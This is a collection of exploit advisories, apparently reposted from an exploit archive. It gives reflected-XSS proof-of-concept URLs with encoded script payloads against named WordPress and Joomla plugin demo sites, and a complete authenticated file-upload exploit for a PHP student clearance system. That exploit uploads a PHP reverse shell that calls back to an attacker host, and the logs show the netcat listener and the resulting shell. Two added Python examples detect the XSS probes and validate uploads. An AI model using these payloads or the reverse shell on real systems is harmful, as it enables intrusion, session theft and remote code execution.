http://pwnedhost.com/online-shopping-system-advanced/product.php [p parameter]]<br />[1.6. http://pwnedhost.com/online-shopping-system-advanced/review.php [email parameter]]<br />[1.7. http://pwnedhost.com/online-shopping-system-advanced/review.php [name parameter]]<br />```<br />PoC:<br />https://github.com/PuneethReddyHC/online-shopping-system-advanced/issues/51<br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html and https://www.exploit-db.com/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable Crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : wordpress.org/plugins/ecommerce-product-catalog/ │<br />│ Vendor : impleCode - implecode.com │<br />│ Software : WordPress eCommerce Product Catalog 3.0.70 │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />URL parameter 'product_category' is vulnerable to XSS<br /><br />Path: /product-category/clothing/sunglasses/men/<br /> <br />https://demo.implecode.com/product-category/clothing/sunglasses/men/?product_category=40&gr0ln%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ewop2e=1<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : ClickFWD LLC. - jreviews.com │<br />│ Software : WordPress JReviews 4.1.5 │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />URL parameter 'listview' is vulnerable to XSS<br /><br />Path: /top-user-rated-listings<br /> <br />https://wp-demo.jreviews.com/top-user-rated-listings?listview=2&qrrwx%22%3e%3cscript%3ealert(1)%3c%2fscript%3et16n9=1<br /><br /><br />URL parameter 'format' is vulnerable to XSS<br /><br />Path: /advanced-search/search-results<br /><br />https://wp-demo.jreviews.com/advanced-search/search-results?pg=2&order=featured&query=all&format=raw&mzh9g%22%3e%3cscript%3ealert(1)%3c%2fscript%3ei8emo=1<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable Crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : e4j Extensions for Joomla - extensionsforjoomla.com │<br />│ Software : Joomla Vik Rent Car 1.14 │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send the victim a link containing a malicious URL in an email or │<br />│ instant message and can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />parameter 'returnplace' is vulnerable to XSS<br /><br />Path: index.php/en/search-your-car<br /> <br />https://extensionsforjoomla.com/livedemo/vikrentcar/index.php/en/search-your-car?option=com_vikrentcar&caropt=4&days=1&pickup=1665565200&release=1665644400&place=2&returnplace=l2cno%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efobrc&task=showprc&Itemid=104&categories=2&goon=Continue<br /><br /><br /><br />parameter 'categories' is vulnerable to XSS<br /><br />Path: index.php/en/search-your-car<br /><br />https://extensionsforjoomla.com/livedemo/vikrentcar/index.php/en/search-your-car?option=com_vikrentcar&caropt=4&days=1&pickup=1665565200&release=1665644400&place=2&returnplace=3&task=showprc&Itemid=104&categories=o41bc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eml8z0&goon=Continue<br /><br /><br />[-] Done<br /></code></pre>
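<p>Added example, not part of either CraCkEr advisory: a Python check that fully percent-decodes every query-string name and value and flags the tag-breakout payloads used in the two PoC URLs above. It handles the double-encoded form sent to Vik Rent Car and the JReviews case where the payload sits in the parameter name rather than its value. The sample URLs are taken from the advisories; the benign third URL is constructed.</p>

```python
"""Detect reflected-XSS probes in request URLs, including the double-encoded
form used in the Vik Rent Car PoC. Added example, not code from either advisory."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Markup that has no business in a query-string name or value once fully decoded
# (a tag opener, a javascript: URL, or an on*= event handler). Heuristic, not a parser.
MARKUP = re.compile(r'<\s*/?\s*[a-z]|javascript:|\bon[a-z]+\s*=', re.I)
MAX_DEPTH = 5  # stop unwrapping nested percent-encoding after this many rounds

def decode_fully(text: str) -> tuple[str, int]:
    """Repeatedly percent-decode until the string stops changing.
    Returns (decoded, extra_rounds); extra_rounds counts passes beyond the single
    pass parse_qsl already performed, so a double-encoded payload reports 1."""
    depth = 0
    while depth < MAX_DEPTH:
        nxt = unquote(text)
        if nxt == text:
            break
        text, depth = nxt, depth + 1
    return text, depth

def find_xss_probes(url: str) -> list[dict]:
    """Return one finding per query-string name or value containing markup.
    Names are inspected too: the JReviews PoC carries its payload in the
    parameter *name* (qrrwx%22%3e%3cscript...=1), which value-only checks miss."""
    findings = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        for where, raw in (("name", name), ("value", value)):
            decoded, depth = decode_fully(raw)
            if MARKUP.search(decoded):
                findings.append({"param": name, "where": where,
                                 "decoded": decoded, "extra_decode_rounds": depth})
    return findings

# Sample input: the two PoC URLs from the advisories above plus one constructed benign request.
SAMPLE_URLS = [
    "https://wp-demo.jreviews.com/top-user-rated-listings?listview=2&qrrwx%22%3e%3cscript%3ealert(1)%3c%2fscript%3et16n9=1",
    "https://extensionsforjoomla.com/livedemo/vikrentcar/index.php/en/search-your-car?option=com_vikrentcar&place=2&returnplace=l2cno%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efobrc&task=showprc",
    "https://wp-demo.jreviews.com/top-user-rated-listings?listview=2&page=3",
]

if __name__ == "__main__":
    for u in SAMPLE_URLS:
        for f in find_xss_probes(u):
            print(f"{f['where']} of {f['param']!r} needed {f['extra_decode_rounds']} extra decode(s): {f['decoded']}")
```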
<pre><code># Exploit Title: Web Based Student Clearance 1.0 - Unrestricted File Upload<br />leads to Remote Code Execution (Authenticated)<br /># Date: 08-10-2022<br /># Exploit Author: Akash Pandey ( L3V1ATH0N )<br /># Vendor Homepage:<br />https://www.sourcecodester.com/php/15627/web-based-student-clearance-system.html<br /># Software Link:<br />https://www.sourcecodester.com/download-code?nid=15627&title=Web-Based+Student+Clearance+System+in+PHP+Free+Source+Code<br /># Version: v1.0<br /># Tested on: Windows, XAMPP, Kali Linux<br /># CVE :<br /><br />----- POC -----<br /><br />Note : The reverse shell below is a Windows-based PHP reverse shell.<br />If the target host is using Linux then a Linux-based PHP reverse shell<br />must be used.<br /><br />---------------<br /><br />Request : URL -<br />http://localhost/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/edit-photo.php<br />=========<br /><br />POST<br />/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/edit-photo.php<br />HTTP/1.1<br />Host: 192.168.1.12<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101<br />Firefox/91.0<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data;<br />boundary=---------------------------71268058833541201443517047173<br />Content-Length: 6864<br />Origin: http://192.168.1.12<br />Connection: close<br />Referer:<br />http://192.168.1.12/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/edit-photo.php<br />Cookie: PHPSESSID=9rnst2bfmbtrgapqsalerlrdjm<br />Upgrade-Insecure-Requests: 1<br /><br />-----------------------------71268058833541201443517047173<br /><br />Content-Disposition: form-data; name="userImage"; filename="shell.php"<br />Content-Type: application/x-php<br /><br /><?php<br /><br />header('Content-type: 
text/plain');<br />$ip = "192.168.1.26"; //change this<br />$port = "80"; //change this<br />$payload =<br />"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";<br />$evalCode = gzinflate(base64_decode($payload));<br />$evalArguments = " ".$port." ".$ip;<br />$tmpdir ="C:\\windows\\temp";<br />chdir($tmpdir);<br />$res .= "Using dir : ".$tmpdir;<br />$filename = "D3fa1t_shell.exe";<br />$file = fopen($filename, 'wb');<br />fwrite($file, $evalCode);<br />fclose($file);<br />$path = $filename;<br />$cmd = $path.$evalArguments;<br />$res .= "\n\nExecuting : ".$cmd."\n";<br />echo $res;<br />$output = system($cmd);<br /><br />?><br /><br />-----------------------------71268058833541201443517047173<br /><br />Content-Disposition: form-data; name="btnedit"<br /><br />-----------------------------71268058833541201443517047173--<br /><br /><br />=========================================<br />End of Request<br />=========================================<br /><br />Response:<br />========<br /><br />HTTP/1.1 302 Found<br />Date: Sat, 08 Oct 2022 09:30:51 GMT<br />Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30<br />X-Powered-By: PHP/7.4.30<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Location: edit-photo.php<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 8575<br /><br />========================================<br />End of Response<br />========================================<br /><br /><br />The Reverse Shell is located at below URL<br />-----------------------------------------<br /><br />Request: URL -<br />http://localhost/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/uploads/shell.php<br />========<br /><br />GET<br />/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/uploads/shell.php<br />HTTP/1.1<br />Host: 192.168.1.12<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; 
rv:91.0) Gecko/20100101<br />Firefox/91.0<br />Accept: image/webp,*/*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Referer:<br />http://192.168.1.12/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/edit-photo.php<br />Cookie: PHPSESSID=9rnst2bfmbtrgapqsalerlrdjm<br /><br />========================================<br />End of Request<br />========================================<br /><br />Response:<br />=========<br /><br />HTTP/1.1 200 OK<br />Date: Sat, 08 Oct 2022 09:32:16 GMT<br />Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30<br />X-Powered-By: PHP/7.4.30<br />Content-Length: 268<br />Connection: close<br />Content-Type: text/plain;charset=UTF-8<br /><br /><br /><br /><b>Notice</b>: Undefined variable: res in<br /><b>C:\xampp\htdocs\student_clearance_system_Aurthur_Javis\student_clearance_system_Aurthur_Javis\uploads\shell.php</b><br />on line <b>12</b><br /><br />Using dir : C:\windows\temp<br /><br />Executing : D3fa1t_shell.exe 80 192.168.1.26<br /><br />========================================<br />End of Response<br />========================================<br /><br />After uploading the reverse shell file you will get the reverse shell<br />normally. If you don't get a reverse shell, browse to the 'uploads' folder.<br /><br />Reverse Shell Remotely:<br />======================<br /><br />┌──(kali㉿kali)-[~]<br />└─$ rlwrap nc -lvnp 80<br />listening on [any] 80 ...<br />connect to [192.168.1.26] from (UNKNOWN) [192.168.1.12] 65168<br />b374k shell : connected<br /><br />Microsoft Windows [Version 10.0.19043.2006]<br />(c) Microsoft Corporation. All rights reserved.<br /><br />whoami<br />whoami<br />l3v1ath0n\admin<br /><br />C:\Windows\Temp><br /></code></pre>
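<p>Added example, not code from the Student Clearance project: the server-side validation an image-upload handler such as edit-photo.php needs in order to refuse the multipart part shown above (field userImage, filename shell.php, Content-Type application/x-php) and to store accepted images under a server-chosen name instead of the client's. The sample file bodies are constructed; the allowlist and magic bytes are standard image signatures.</p>

```python
"""Checks an upload handler should apply before storing a file. Added example;
not the Student Clearance project's code."""
import os
import secrets
from typing import Optional

# Extension -> magic bytes the body must start with. Only raster images are accepted.
ALLOWED = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
ALLOWED_MIME = {"image/png", "image/jpeg", "image/gif"}

def validate_upload(filename: str, content_type: str, data: bytes) -> tuple[bool, str, Optional[str]]:
    """Return (accepted, reason, stored_name).

    The multipart filename and Content-Type are client-controlled, so the
    body's magic bytes are the deciding check. stored_name is a random
    server-generated name carrying the allowed extension; it should be written
    outside the web root (or to a directory with script execution disabled)."""
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    if ext not in ALLOWED:
        return False, f"extension {ext or '(none)'} not allowed", None
    if content_type.split(";")[0].strip().lower() not in ALLOWED_MIME:
        return False, f"content type {content_type} not allowed", None
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return False, "file body does not match declared image type", None
    # Defense in depth against image/PHP polyglots; the real control is never
    # letting the stored file reach the PHP handler.
    if b"<?php" in data or b"<?=" in data:
        return False, "embedded PHP open tag", None
    return True, "ok", secrets.token_hex(16) + ext

# Constructed samples: the start of the part sent in the advisory's request, a
# minimal PNG header, and a PNG with a PHP tag appended.
SHELL_PHP = b"<?php\nheader('Content-type: text/plain');\n$ip = \"192.168.1.26\";\n"
PNG_MINIMAL = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
POLYGLOT = PNG_MINIMAL + b"<?php echo 'x'; ?>"

if __name__ == "__main__":
    for name, ctype, body in [("shell.php", "application/x-php", SHELL_PHP),
                              ("shell.png", "image/png", SHELL_PHP),
                              ("photo.png", "image/png", PNG_MINIMAL)]:
        print(name, validate_upload(name, ctype, body))
```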